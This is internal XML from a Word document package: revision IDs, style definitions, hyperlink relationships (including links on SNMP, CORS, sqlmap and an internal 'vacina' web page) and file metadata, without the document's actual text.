    <w:rsid w:val="008A7BB2"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C2F72"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00902307"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00912FAA"/>
    <w:rsid w:val="00915C31"/>
    <w:rsid w:val="00925B9A"/>
    <w:rsid w:val="00930BEA"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00935C82"/>
    <w:rsid w:val="0094228B"/>
    <w:rsid w:val="00944F31"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="0096190A"/>
    <w:rsid w:val="00967B9F"/>
    <w:rsid w:val="009732FF"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="00986FE1"/>
    <w:rsid w:val="00987029"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A30BC"/>
    <w:rsid w:val="009A4847"/>
    <w:rsid w:val="009A5A72"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B1DC9"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009B7841"/>
    <w:rsid w:val="009B7BA9"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C3F25"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009C5396"/>
    <w:rsid w:val="009C5A26"/>
    <w:rsid w:val="009C67EC"/>
    <w:rsid w:val="009C7901"/>
    <w:rsid w:val="009D0F86"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009E4891"/>
    <w:rsid w:val="009F24CC"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="009F42DE"/>
    <w:rsid w:val="009F5169"/>
    <w:rsid w:val="009F6C94"/>
    <w:rsid w:val="009F7A3C"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A06B72"/>
    <w:rsid w:val="00A124EE"/>
    <w:rsid w:val="00A13973"/>
    <w:rsid w:val="00A16205"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A218DE"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A30A25"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A40129"/>
    <w:rsid w:val="00A5289A"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A66072"/>
    <w:rsid w:val="00A80565"/>
    <w:rsid w:val="00A83EB9"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A93C57"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00A966EC"/>
    <w:rsid w:val="00AA00BE"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB5BB3"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00AC10DC"/>
    <w:rsid w:val="00AC1669"/>
    <w:rsid w:val="00AC4354"/>
    <w:rsid w:val="00AE5327"/>
    <w:rsid w:val="00AF04A2"/>
    <w:rsid w:val="00AF248B"/>
    <w:rsid w:val="00AF4680"/>
    <w:rsid w:val="00B004A6"/>
    <w:rsid w:val="00B005A4"/>
    <w:rsid w:val="00B01036"/>
    <w:rsid w:val="00B04AF1"/>
    <w:rsid w:val="00B05006"/>
    <w:rsid w:val="00B07E20"/>
    <w:rsid w:val="00B135C4"/>
    <w:rsid w:val="00B13932"/>
    <w:rsid w:val="00B15531"/>
    <w:rsid w:val="00B17B93"/>
    <w:rsid w:val="00B25D43"/>
    <w:rsid w:val="00B3361B"/>
    <w:rsid w:val="00B3425E"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B560B0"/>
    <w:rsid w:val="00B654D1"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B7146E"/>
    <w:rsid w:val="00B71A0F"/>
    <w:rsid w:val="00B770F6"/>
    <w:rsid w:val="00B77FD2"/>
    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B846D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00B959F5"/>
    <w:rsid w:val="00BA5C02"/>
    <w:rsid w:val="00BA7CEE"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC404F"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BC5DD9"/>
    <w:rsid w:val="00BD2955"/>
    <w:rsid w:val="00BD33F6"/>
    <w:rsid w:val="00BD4B94"/>
    <w:rsid w:val="00BE0837"/>
    <w:rsid w:val="00BE4C3F"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF1C7D"/>
    <w:rsid w:val="00BF5785"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C0198A"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C07971"/>
    <w:rsid w:val="00C12C3D"/>
    <w:rsid w:val="00C306C8"/>
    <w:rsid w:val="00C32280"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C343E3"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C36925"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C37DA7"/>
    <w:rsid w:val="00C52360"/>
    <w:rsid w:val="00C52795"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C654ED"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00C8356E"/>
    <w:rsid w:val="00C86D69"/>
    <w:rsid w:val="00C97F3F"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CC2CE7"/>
    <w:rsid w:val="00CC3790"/>
    <w:rsid w:val="00CC524A"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE03DD"/>
    <w:rsid w:val="00CE16CE"/>
    <w:rsid w:val="00CE2FCC"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00CE5109"/>
    <w:rsid w:val="00CE679F"/>
    <w:rsid w:val="00D02F49"/>
    <w:rsid w:val="00D04B46"/>
    <w:rsid w:val="00D058E7"/>
    <w:rsid w:val="00D136D4"/>
    <w:rsid w:val="00D152F5"/>
    <w:rsid w:val="00D20770"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D27AD8"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D349CE"/>
    <w:rsid w:val="00D3778D"/>
    <w:rsid w:val="00D41B54"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D43F1D"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D45386"/>
    <w:rsid w:val="00D46C6B"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D516F1"/>
    <w:rsid w:val="00D56FE7"/>
    <w:rsid w:val="00D57137"/>
    <w:rsid w:val="00D602EF"/>
    <w:rsid w:val="00D60336"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D640DA"/>
    <w:rsid w:val="00D65D65"/>
    <w:rsid w:val="00D76012"/>
    <w:rsid w:val="00D762D7"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00D9019E"/>
    <w:rsid w:val="00D918FF"/>
    <w:rsid w:val="00D967F2"/>
    <w:rsid w:val="00D975CE"/>
    <w:rsid w:val="00DB6E0A"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DD2E6C"/>
    <w:rsid w:val="00DD39B4"/>
    <w:rsid w:val="00DD5893"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00DF0646"/>
    <w:rsid w:val="00DF35C8"/>
    <w:rsid w:val="00E00DD2"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E04E3E"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E14BE4"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E158B8"/>
    <w:rsid w:val="00E16F18"/>
    <w:rsid w:val="00E27C08"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E31790"/>
    <w:rsid w:val="00E31983"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E4538D"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E513AC"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E52521"/>
    <w:rsid w:val="00E650F5"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E804ED"/>
    <w:rsid w:val="00E8506C"/>
    <w:rsid w:val="00E92559"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00E9423C"/>
    <w:rsid w:val="00E95ED3"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EB5A0B"/>
    <w:rsid w:val="00EC0987"/>
    <w:rsid w:val="00EC1DCA"/>
    <w:rsid w:val="00EC2366"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00ED180C"/>
    <w:rsid w:val="00ED7438"/>
    <w:rsid w:val="00EE2B51"/>
    <w:rsid w:val="00EE46EF"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F02825"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F06499"/>
    <w:rsid w:val="00F134D7"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F15B60"/>
    <w:rsid w:val="00F15F82"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24A83"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F31372"/>
    <w:rsid w:val="00F31428"/>
    <w:rsid w:val="00F3154F"/>
    <w:rsid w:val="00F338E7"/>
    <w:rsid w:val="00F35A51"/>
    <w:rsid w:val="00F474A9"/>
    <w:rsid w:val="00F52870"/>
    <w:rsid w:val="00F5692A"/>
    <w:rsid w:val="00F6048E"/>
    <w:rsid w:val="00F71E4B"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00F86B59"/>
    <w:rsid w:val="00F87AAF"/>
    <w:rsid w:val="00F935DA"/>
    <w:rsid w:val="00FA1088"/>
    <w:rsid w:val="00FB2992"/>
    <w:rsid w:val="00FB3CB1"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FD2A48"/>
    <w:rsid w:val="00FD3807"/>
    <w:rsid w:val="00FD661B"/>
    <w:rsid w:val="00FD7057"/>
    <w:rsid w:val="00FE4996"/>
    <w:rsid w:val="00FE6FEB"/>
    <w:rsid w:val="00FF0B7E"/>
    <w:rsid w:val="00FF1403"/>
    <w:rsid w:val="00FF1C9C"/>
    <w:rsid w:val="00FF400C"/>
    <w:rsid w:val="00FF59A8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45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25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  <w:style w:type="character" w:styleId="Refdecomentrio">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00497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77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77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7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77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25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  <w:style w:type="character" w:styleId="Refdecomentrio">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00497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77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77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7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7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yperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Protocol" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.7/en/comments.html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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBI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192.168.0.58/vacina/index.php?pg=servidores" TargetMode="External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yperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protocol" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/cc736675(v=ws.10)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www.w3.org/TR/cors/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.microsoft.com/office/2011/relationships/people" Target="peop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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/commen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yperlink" Target="http://192.168.0.58/vacina/login.php?logado=false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hackertarget.com/sqlmap-post-request-injection/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://software.dzhuvinov.com/cors-filter.html" TargetMode="External"/><Relationship Id="rId56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https://technet.microsoft.com/pt-br/library/ms188621(v=sql.105)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66A3-156F-4536-AFBC-34F1B754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6</Pages>
  <Words>9490</Words>
  <Characters>51246</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>427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Pamela Beatriz</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-29T16:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-07-01T08:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>